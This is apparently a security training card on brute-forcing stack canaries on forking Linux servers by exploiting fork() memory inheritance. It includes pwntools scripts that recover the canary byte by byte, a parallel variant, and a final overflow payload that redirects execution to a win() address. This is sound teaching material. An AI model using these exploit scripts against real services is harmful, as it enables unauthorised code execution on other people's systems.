Canary Brute-Force on Forking Servers: Byte-by-Byte Enumeration Exploiting fork() Memory Inheritance

reverse_engineering Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Forking servers, such as Apache in pre-fork mode and many CTF challenge servers, call fork() to handle each connection. The child process inherits an exact copy of the parent's memory, including the master stack canary stored in thread-local storage at fs:0x28 (x86-64 Linux). As long as the child does not call execve(), the canary is the same across all forks of the same parent process, so it can be brute-forced byte by byte without an explicit information-leak primitive. Services launched through xinetd are a common exception: xinetd forks and then execs the service binary, so every connection starts with a fresh canary. The attack requires at most 256 × 8 = 2048 connection attempts to recover all 8 bytes, and fewer when the low byte is known to be null. NICE K0168 and S0131 require understanding this forking-server property and how to implement an efficient byte-by-byte oracle. This is the standard technique when no format string or other info-leak is available.

Core Concept

fork() creates a child process with a copy of the parent's address space, including:
- Stack contents (and therefore the canary on the stack at the point of fork)
- TLS segment at fs:0x28 (the master canary value)
- Heap, globals, and all other memory

The child's canary is identical to the parent's. When the child crashes (SIGSEGV or __stack_chk_fail), the parent continues and the next fork() call creates another child with the same canary. This gives an attacker an unlimited oracle: send a candidate canary, observe whether the process crashes or continues, repeat.
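The inheritance property can be observed without a vulnerable binary. The following is a minimal sketch, assuming a POSIX system where os.fork() is available; the function name canary_seen_by_children and the Python variable standing in for the canary are illustrative only, since the real canary lives in the C runtime's TLS rather than in Python state.

```python
import os
import secrets


def canary_seen_by_children(n_children: int = 3):
    """Fork n children; each reports the 'canary' it inherited through a pipe."""
    # Stand-in for the real canary: a null low byte followed by 7 random bytes
    canary = b"\x00" + secrets.token_bytes(7)
    seen = []
    for _ in range(n_children):
        read_fd, write_fd = os.pipe()
        pid = os.fork()
        if pid == 0:
            # Child: report the inherited value, then exit immediately
            os.close(read_fd)
            os.write(write_fd, canary)
            os._exit(0)
        # Parent: collect the child's report and reap it
        os.close(write_fd)
        seen.append(os.read(read_fd, 8))
        os.close(read_fd)
        os.waitpid(pid, 0)
    return canary, seen


if __name__ == "__main__":
    parent_value, child_values = canary_seen_by_children()
    print("parent:  ", parent_value.hex())
    for value in child_values:
        print("child:   ", value.hex())
```

Every child prints the same value as the parent because none of them calls exec; a process that execs a new binary would receive a freshly generated canary instead.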

Byte-by-byte oracle: instead of guessing all 8 bytes at once (256^8 attempts), guess one byte at a time:

Fix the known prefix (start with \x00 for byte 0: on Linux x86-64 with glibc, the canary's lowest byte is always null)
Try all 256 values for byte 1: send an overflow of padding + \x00 + candidate_byte that stops right after the candidate, so the remaining six canary bytes, saved RBP, and saved RIP stay untouched
If the process does not crash (or responds normally), the candidate byte is correct
Move to byte 2, keep byte 1 fixed, repeat

Total attempts: 1 (byte 0, always \x00) + 256×7 = 1793 attempts maximum. Average: 1 + 128×7 = 897 attempts.
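The attempt counts can be checked against a simulated oracle before touching a real target. This is a sketch under stated assumptions: SimulatedOracle and recover are hypothetical names, and the oracle simply compares a prefix against a secret, which models a child that survives only when every overwritten canary byte matches.

```python
import secrets


class SimulatedOracle:
    """Stand-in for a forked child: it 'survives' only if every overwritten byte matches."""

    def __init__(self, secret: bytes):
        self.secret = secret
        self.attempts = 0

    def __call__(self, prefix: bytes) -> bool:
        self.attempts += 1
        return self.secret.startswith(prefix)


def recover(oracle, length: int = 8, known: bytes = b"\x00") -> bytes:
    """Recover the secret one byte at a time, starting from the known low byte."""
    recovered = known
    while len(recovered) < length:
        for candidate in range(256):
            if oracle(recovered + bytes([candidate])):
                recovered += bytes([candidate])
                break
        else:
            raise RuntimeError(f"no candidate survived at byte {len(recovered)}")
    return recovered


if __name__ == "__main__":
    secret = b"\x00" + secrets.token_bytes(7)
    oracle = SimulatedOracle(secret)
    assert recover(oracle) == secret
    print(f"recovered in {oracle.attempts} probes (worst case {256 * 7})")
```

The simulation counts only the probes for bytes 1 to 7, so its worst case is 256 × 7 = 1792; the figure of 1793 above additionally counts the fixed byte 0 as one step.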

Detecting crash vs. success: the oracle response depends on the server's behavior:
- Connection closed without response: crash (SIGSEGV or __stack_chk_fail)
- Connection sends expected response: success, so the candidate byte is correct
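The two outcomes can be told apart with nothing more than the standard socket module. The sketch below is illustrative: probe is a hypothetical helper, and it assumes the server sends nothing before reading input. If the target prints a prompt first, that prompt must be consumed before the payload is sent, otherwise it would be mistaken for a success response.

```python
import socket


def probe(host: str, port: int, payload: bytes, timeout: float = 2.0) -> bool:
    """Return True if the server replies after the payload, False if it hangs up or stays silent."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as conn:
            conn.sendall(payload)
            data = conn.recv(4096)   # b'' means the peer closed the connection
            return len(data) > 0
    except OSError:
        # Covers connection resets, refused connections, and timeouts
        return False
```

Treating a timeout as a failure is a design choice: a child that hangs is indistinguishable from one that crashed slowly, so a timeout value well above the server's normal response time keeps false negatives down.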

Technical Deep-Dive

from pwn import *
import sys

HOST = 'localhost'
PORT = 9999

def try_canary(canary_bytes):
    """Overwrite only the first len(canary_bytes) canary bytes; return True if the child survives."""
    try:
        r = remote(HOST, PORT, timeout=2)
        r.recvuntil(b'Input: ', timeout=2)

        # buf_size = 64 bytes to reach canary; adjust for your target
        buf_size = 64
        payload  = b'A' * buf_size          # fill buffer
        payload += canary_bytes              # known prefix + one candidate byte
        # Stop here: the remaining canary bytes, saved RBP and saved RIP must stay
        # untouched, otherwise every probe crashes regardless of the candidate.
        # send() rather than sendline(): a trailing newline would clobber the next byte.
        # Assumes the target reads raw bytes (read()/recv()) and appends no terminator.
        r.send(payload)

        # If the server echoes back something / sends a menu again: success
        response = r.recv(timeout=1)
        r.close()
        return len(response) > 0
    except Exception:
        # EOFError from recv() means the child died before replying
        return False

def brute_canary():
    canary = b'\x00'    # low byte always 0x00

    for byte_idx in range(1, 8):
        found = False
        for candidate in range(0x00, 0x100):
            # Partial overwrite: known prefix plus one candidate, no padding after it
            probe = canary + bytes([candidate])
            if try_canary(probe):
                canary += bytes([candidate])
                log.info(f'Byte {byte_idx}: {candidate:#04x}  canary so far: {canary.hex()}')
                found = True
                break
        if not found:
            log.error(f'Failed at byte {byte_idx}')
            sys.exit(1)

    return canary

canary = brute_canary()
log.success(f'Full canary: {canary.hex()} = {u64(canary):#018x}')

# Now use the leaked canary for the real exploit
r = remote(HOST, PORT)
r.recvuntil(b'Input: ')
payload  = b'A' * 64
payload += canary
payload += p64(0xdeadbeef)    # saved RBP
payload += p64(0x401234)      # win() address
r.sendline(payload)
r.interactive()

Timing optimization: parallelise byte guesses per position — send 256 connections simultaneously (or in batches), observe which one succeeds. This reduces wall-clock time from minutes to seconds:

from concurrent.futures import ThreadPoolExecutor, as_completed

def check_byte(candidate, known_prefix):
    # Partial overwrite: known prefix plus one candidate byte, nothing after it
    probe = known_prefix + bytes([candidate])
    return candidate, try_canary(probe)

canary = b'\x00'
for byte_idx in range(1, 8):
    hit = None
    with ThreadPoolExecutor(max_workers=32) as executor:
        futures = [executor.submit(check_byte, c, canary) for c in range(0x100)]
        for future in as_completed(futures):
            candidate, success = future.result()
            if success:
                hit = candidate
                # Drop probes that have not started yet; running ones finish on exit
                for pending in futures:
                    pending.cancel()
                break
    if hit is None:
        log.error(f'Failed at byte {byte_idx}')   # pwntools raises here
    canary += bytes([hit])
    log.info(f'Byte {byte_idx}: {hit:#04x}')

Reverse Engineering Methodology

Confirm the server forks: strace -e trace=clone,fork ./server or pstree during connection to see if child processes spawn. A new PID per connection confirms forking.
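Confirm the canary is consistent: attach a debugger to two different children (or load two core dumps) and read the canary from each, for example with x/gx $fs_base+0x28 in a recent gdb. dmesg alone does not show the canary value. If the values differ, the server execs a fresh binary per connection (or otherwise re-randomises) and the brute force will not converge.
Find the buffer-to-canary offset: with a canary in place, cyclic(200) aborts in __stack_chk_fail before the corrupted return address is ever used, so the usual crash-offset trick does not apply directly. Locally, break at the canary check in a debugger and look up the pattern bytes that replaced the canary with cyclic_find. Remotely, grow the input one byte at a time: the largest length that still gets a normal response is the number of bytes before the canary.
Automate with pwntools: use remote() in a loop with appropriate timeout settings. When the child dies, the kernel closes its socket and pwntools raises EOFError from recv(); catch it to detect the "wrong candidate" case.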
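The remote variant of the offset search can be sketched as a binary search over input lengths. This is a hedged illustration: find_canary_offset and the survives callback are hypothetical names, survives(n) is assumed to send exactly n non-null filler bytes and report whether the child responded normally, and the search assumes that nothing between the buffer and the canary causes an earlier crash when overwritten.

```python
def find_canary_offset(survives, max_len: int = 512) -> int:
    """Return the largest filler length that does not crash the child.

    Because the canary's low byte is \\x00, the first non-null filler byte
    that reaches the canary already fails the check, so survival is
    monotone: True up to the offset, False beyond it.
    """
    if not survives(0):
        raise ValueError("target crashes even with empty input")
    if survives(max_len):
        raise ValueError("no crash observed up to max_len; raise the limit")

    low, high = 0, max_len          # invariant: survives(low), not survives(high)
    while high - low > 1:
        mid = (low + high) // 2
        if survives(mid):
            low = mid
        else:
            high = mid
    return low


if __name__ == "__main__":
    # Simulated target with 64 bytes between buffer start and canary
    print(find_canary_offset(lambda n: n <= 64))
```

Binary search needs roughly log2(max_len) connections instead of one per length, which matters when the server rate-limits connections.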

Common Reversing Errors

Assuming all servers are forking: thread-based servers do not fork. Every thread sees the same process-wide canary, but a failed check aborts the whole process, not just the handling thread, so the oracle breaks. If a supervisor restarts the server, the new process gets a fresh canary and every byte recovered so far is lost. Confirm a fork-per-connection model before investing in the brute force.
Using a non-null byte 0: on Linux x86-64 with glibc, the canary's first (lowest-address) byte is always \x00. If the probe starts with a non-null byte 0, every attempt at byte 1 fails because the comparison already fails at byte 0. Always fix byte 0 as \x00.
Slow sequential guessing making the challenge time out: many CTF challenges have connection rate limits or total time limits. Use parallelism (as shown above) to complete the brute force within a minute rather than an hour.
Mistaking a canary check failure for the overflow itself: __stack_chk_fail calls abort(), which sends SIGABRT. The process exits with signal 6, not SIGSEGV (signal 11). Both result in connection closure, but if you have shell access, checking $? or dmesg distinguishes them.
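When shell access to the server is available, the $? value can be decoded mechanically. The helper below is a small sketch; killed_by is a hypothetical name, and it relies on the common shell convention that a process terminated by signal N is reported as exit status 128 + N.

```python
import signal


def killed_by(shell_status: int):
    """Map a shell $? value to the terminating signal, or None for a normal exit."""
    if shell_status > 128:
        try:
            return signal.Signals(shell_status - 128)
        except ValueError:
            return None   # not a signal number known on this platform
    return None


if __name__ == "__main__":
    for status in (0, 134, 139):
        sig = killed_by(status)
        print(status, sig.name if sig else "normal exit")
```

Under this convention a status of 134 corresponds to signal 6 (the abort() path taken by __stack_chk_fail) and 139 to signal 11 (a segmentation fault).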

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.